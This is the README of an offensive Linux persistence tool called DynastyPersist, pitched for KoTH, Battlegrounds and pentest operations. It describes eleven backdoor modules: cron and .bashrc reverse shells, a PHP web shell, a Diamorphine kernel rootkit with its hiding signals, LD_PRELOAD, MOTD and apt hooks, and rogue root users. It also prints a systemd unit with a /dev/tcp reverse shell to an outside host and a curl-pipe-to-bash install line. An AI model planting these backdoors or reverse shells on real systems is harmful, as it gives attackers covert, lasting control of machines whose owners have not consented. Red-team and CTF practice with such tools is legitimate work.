Supports KoTH, Battlegrounds and Pentest Operations
Install
•
Documentation
•
Usage
| Features | Description |
|---|---|
| SSH Key Generation | Automatically generates SSH keys for covert access. |
| Cronjob Persistence | Sets up cronjobs for scheduled persistence. |
| Custom User with Root | Creates a custom user with root privileges. |
| RCE Persistence | Achieves persistence through remote code execution |
| LKM/Rootkit | Demonstrates Linux Kernel Module (LKM) based rootkit persistence. |
| Bashrc Persistence | Modifies user-specific shell initialization files for persistence (aliases / reverse shells). |
| Systemd Service for Root | Sets up a systemd service for achieving root persistence. |
| LD_PRELOAD Privilege Escalation Config | Configures LD_PRELOAD for privilege escalation. |
| Backdooring Message of the Day / Header | Backdoors system message display for covert access. |
| Modify an Existing Systemd Service | Manipulates an existing systemd service for persistence. |
| Backdoors APT Command | Backdoors apt command to pop up a shell. |
-
Gain access to a server using
sshkey generation. This module creates anid_rsakey for every user. Which can be used for reverse access. After, running this module the attacker can connect to the server viassh. -
This can be manually done using the
ssh-keygencommand. However, the module creates a private key for every user in no time.
root@kali ~ ssh -i id_rsa root@10.10.110.101- Module Number:
1
-
Cronjobs in Linux are scheduled tasks that run automatically at specified intervals.
-
One of the most efficient modules, that involves reverse shells. This module directly writes reverse shell commands to
/etc/crontab. Which will pop up a shell in the port you listening to.
root@kali ~ nc -nvlp 9999- Module Number:
2
- A simple and fast method to gain reverse access. Simply, this module creates another user with root access. Later on, the attacker can login to the user via
ssh.
root@kali ~ ssh newuser@10.10.110.101- Module Number:
3
-
This module, comes with a
phpscript that is hosted in the web root directory. The script is located in/var/www/html/dynasty_rce/rce.php. Further, the prefixdynasty_rcecan be hidden if theLKMmodule is run before. -
Visiting
victim_ip:port/dynasty_rce/rce.phpwill give you the power to run commands within the shell. -
Module Number:
4
- An advanced persistence method, that implants a rootkit to the server's kernel. The program focuses on an open-source
LKMrootkit calledDiamorphine. The module is in/var/tmp/.memoryas a temporary location. This directory is deleted after the module is set up. - The below code block shows the uses of this module.
victim@ubuntu ~ kill -64 0 # Promtes to root user.
victim@ubuntu ~ mkdir dynasty_persist # Any directory starting with dynasty will be hidden.
victim@ubuntu ~ kill -31 <process> # Hides processors
victim@ubuntu ~ lsmod | grep -i diamorphine # Hides itself
victim@ubuntu ~ kill -63 0 # Make it appear in lsmod output- Module Number:
5
- This module, writes reverse shell commands, aliases, and variables for reverse access. A shell is gifted when a user logs in to the server or the person uses
findorcat.
root@kali ~ nc -nvlp 9999- Module Number:
6
-
A module that creates a custom service in
systemdfor reverse access. -
An example:
Description=Dynasty Persist
[Service]
ExecStart=sudo bash /bin/bash -c 'bash -i >& /dev/tcp/10.10.14.3/9999 0>&1'
Restart=always
RestartSec=30
[Install]
WantedBy=default.target"-
The above example, will be created as a service. This method is efficient and durable.
-
Module Number:
7
-
LD_PRELOAD is an environment variable in Linux that allows users to pre-load a shared library before other libraries. Privilege escalation using LD_PRELOAD involves loading a malicious library to intercept and modify system calls, potentially gaining elevated privileges. The module backdoors command like
findandwget. -
Module Number:
8
-
The "Message of the Day" (MOTD) in Linux is a customizable text displayed to users upon login, providing information or updates about the system. It is typically stored in the /etc/motd file and can be modified by system administrators.
-
This module, writes a shell to
/etc/update-motd.d/00-header. This is typically, triggered when a user logs in. -
Module Number:
9
-
Similar to module
7, this one modifies an existing service for reverse access. -
Simply, it rewrites the
ExecStartPrein the service to a reverse shell command. -
Module Number:
10
-
"APT" stands for Advanced Package Tool, and it's commonly used in Debian-based systems such as Ubuntu. The file will be here:
/etc/apt/apt.conf.d/42backdoor -
Backdoors the
aptcommand, wheneveraptis run it'll pop up a shell. -
Module Number:
11
-
Currently, there are 2 modes available in the latest update (1.4).
-
Modes are
consoleandctfwhich are designed to work in a specific behavior. -
In comparison, the
consolemode comes with more features and stability than thectfmode.
-
consolemode enters the tool in the usual setup, with all features. These features will run locally on the local host where the script is being executed. Designed for persistence in real-time operations. -
The prefix
usefollowed by the module number will be used to run any selected module. Like,use 1 -
Also, the interface is updated the modules/payloads are now visible when you type
show payloads. -
Lastly, the help/options menu is also modified enter
show optionsto view it.
-
ctfmode is an extra feature to log in to a compromised server via SSH and gain persistence. This addon will help a lot in KoTH or Battlegrounds. Further, this will save a lot of time taken for setting up persistence. -
Runs most of the functions in
console.
- The syntax to use the tool is described below:
$ ./dynasty.sh <lhost> <lport> <mode>
$ ./dynasty.sh ctf
$ ./dynasty.sh 10.10.14.3 9999 console Via Git
$ git clone https://github.com/Trevohack/DynastyPersist
$ cd DynastyPersist/src Via Curl
$ curl -sSL https://raw.githubusercontent.com/Trevohack/DynastyPersist/main/src/dynasty.sh | bash